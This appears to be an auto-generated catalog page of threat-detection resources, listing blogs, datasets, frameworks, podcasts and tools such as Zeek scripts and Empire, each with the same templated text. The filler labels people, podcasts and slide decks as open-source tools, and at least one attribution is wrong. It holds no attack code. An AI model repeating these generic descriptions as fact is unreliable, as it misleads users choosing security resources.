Open-Source Cybersecurity Tools: Threat Detection

This category contains 116 documented tools. It focuses on capabilities used for baseline hardening, monitoring integration, and defense-in-depth validation. Use this section when building shortlists, comparing operational tradeoffs, and mapping controls to detection/response ownership.

Category Evaluation Checklist

  • Coverage depth against your highest-priority threats and compliance obligations.
  • Operational overhead for deployment, tuning, and long-term maintenance.
  • Signal quality versus analyst workload and false-positive pressure.
  • Integration fit with SIEM, ticketing, identity, cloud, and engineering workflows.
  • Governance readiness including auditability, ownership clarity, and change control.

Letter A

This letter section contains 11 tools.

A Research-Driven process applied to Threat Detection Engineering Inputs

  • Website: https://ateixei.medium.com/a-research-driven-process-applied-to-threat-detection-engineering-inputs-1b7e6fe0412b
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: A Research-Driven process applied to Threat Detection Engineering Inputs is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. No source summary is available for this entry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

A Simple Hunting Maturity Model

  • Website: http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: A Simple Hunting Maturity Model is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Actionable Detects

  • Website: https://prezi.com/vejpnxkm85ih/actionable-detects-dns-keynote/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Actionable Detects is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Blue Team Tactics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Active Directory Threat Hunting

  • Website: https://adsecurity.org/wp-content/uploads/2017/04/2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Active Directory Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

adversary_emulation_library

  • Website: https://github.com/center-for-threat-informed-defense/adversary_emulation_library
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: adversary_emulation_library is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Alerting and Detection Strategies Framework

  • Website: https://github.com/palantir/alerting-detection-strategy-framework
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Alerting and Detection Strategies Framework is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A framework for developing alerting and detection strategies.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Alerting and Detection Strategy Framework

  • Website: https://medium.com/@palantir/alerting-and-detection-strategy-framework-52dc33722df2
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Alerting and Detection Strategy Framework is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Alexandre Teixeira

  • Website: https://ateixei.medium.com
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Alexandre Teixeira is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Blogs.

An Introduction to HTTP fingerprinting

  • Website: https://www.net-square.com/httprint_paper.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: An Introduction to HTTP fingerprinting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Anton Chuvakin

  • Website: https://medium.com/anton-on-security
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Anton Chuvakin is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Blogs.

attack_data

  • Website: https://github.com/splunk/attack_data
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: attack_data is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A repository of curated datasets from various attacks.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Letter B

This letter section contains 7 tools.

Boss of the SOC (BOTS) Dataset Version 1

  • Website: https://github.com/splunk/botsv1
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Boss of the SOC (BOTS) Dataset Version 1 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Boss of the SOC (BOTS) Dataset Version 2

  • Website: https://github.com/splunk/botsv2
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Boss of the SOC (BOTS) Dataset Version 2 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Boss of the SOC (BOTS) Dataset Version 3

  • Website: https://github.com/splunk/botsv3
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Boss of the SOC (BOTS) Dataset Version 3 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

botconf 2016 Slides

  • Website: https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: botconf 2016 Slides is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. No source summary is available for this entry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Bro-Osquery

  • Website: https://github.com/bro/bro-osquery
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Bro-Osquery is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Bro integration with osquery.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Brosquery

  • Website: https://github.com/jandre/brosquery
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Brosquery is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A module for osquery to load Bro logs into tables.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

BZAR

  • Website: https://github.com/mitre-attack/bzar
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: BZAR is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Bro/Zeek ATT&CK-based Analytics and Reporting, a set of Zeek scripts to detect ATT&CK techniques.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Letter C

This letter section contains 5 tools.

C2 Matrix

  • Website: https://www.thec2matrix.com/matrix
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: C2 Matrix is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. No source summary is available for this entry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Capability Abstraction

  • Website: https://posts.specterops.io/capability-abstraction-fbeaeeb26384
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Capability Abstraction is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. No source summary is available for this entry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

CIC Datasets

  • Website: https://www.unb.ca/cic/datasets/index.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: CIC Datasets is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Canadian Institute for Cybersecurity datasets.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Cyber Kill Chain

  • Website: https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Cyber Kill Chain is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: It is part of the Intelligence Driven Defense® model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

CyberThreatHunting

  • Website: https://github.com/A3sal0n/CyberThreatHunting
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: CyberThreatHunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A collection of resources for threat hunters.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Letter D

This letter section contains 10 tools.

Darknet Diaries

  • Website: https://darknetdiaries.com
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Darknet Diaries is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by Andy Greenberg - True stories from the dark side of the Internet.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Podcasts.

Data Science Hunting Funnel

  • Website: http://www.austintaylor.io/network/traffic/threat/data/science/hunting/funnel/machine/learning/domain/expertise/2017/07/11/data-science-hunting-funnel/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Data Science Hunting Funnel is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

data_hacking

  • Website: https://github.com/SuperCowPowers/data_hacking
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: data_hacking is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Examples of using IPython, Pandas, and Scikit Learn to get the most out of your security data.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Data Science.

Detecting DNS Tunneling

  • Website: https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Detecting DNS Tunneling is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Detecting dynamic DNS domains in Splunk

  • Website: https://www.splunk.com/blog/2015/08/04/detecting-dynamic-dns-domains-in-splunk.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Detecting dynamic DNS domains in Splunk is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Detection Engineering Weekly

  • Website: https://www.detectionengineering.net
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Detection Engineering Weekly is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by Zack 'techy' Allen.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Newsletters.

Detection Spectrum

  • Website: https://posts.specterops.io/detection-spectrum-198a0bfb9302
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Detection Spectrum is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. The source list provides no description for this entry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Detection: Challenging Paradigms

  • Website: https://www.dcppodcast.com/all-episodes
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Detection: Challenging Paradigms is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by SpecterOps.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Podcasts.

DetectionLab

  • Website: https://github.com/clong/DetectionLab/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: DetectionLab is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

DNS is NOT Boring

  • Website: https://www.first.org/resources/papers/conf2017/DNS-is-NOT-Boring-Using-DNS-to-Expose-and-Thwart-Attacks.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: DNS is NOT Boring is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Using DNS to Expose and Thwart Attacks.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Letter E

This letter section contains 6 tools.

Effective TLS Fingerprinting Beyond JA3

  • Website: https://www.ntop.org/ndpi/effective-tls-fingerprinting-beyond-ja3/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Effective TLS Fingerprinting Beyond JA3 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Elastic Detection Rules

  • Website: https://github.com/elastic/detection-rules
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Elastic Detection Rules is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Detection Rules.

Empire

  • Website: https://github.com/EmpireProject/Empire
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection, Awesome Cyber Security Tools, Awesome Hacking

What it does: Empire is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A post-exploitation framework for PowerShell and Python.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Tools.

EQL

  • Website: https://github.com/endgameinc/eql
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: EQL is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Event Query Language.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

EQLLib

  • Website: https://github.com/endgameinc/eqllib
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: EQLLib is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Event Query Language Analytics Library (eqllib) is a library of event based analytics, written in EQL to detect adversary behaviors identified in MITRE ATT&CK™.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Expert Investigation Guide - Threat Hunting

  • Website: https://github.com/Foundstone/ExpertInvestigationGuides/tree/master/ThreatHunting
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Expert Investigation Guide - Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Letter G

This letter section contains 1 tool.

Generating Hypotheses for Successful Threat Hunting

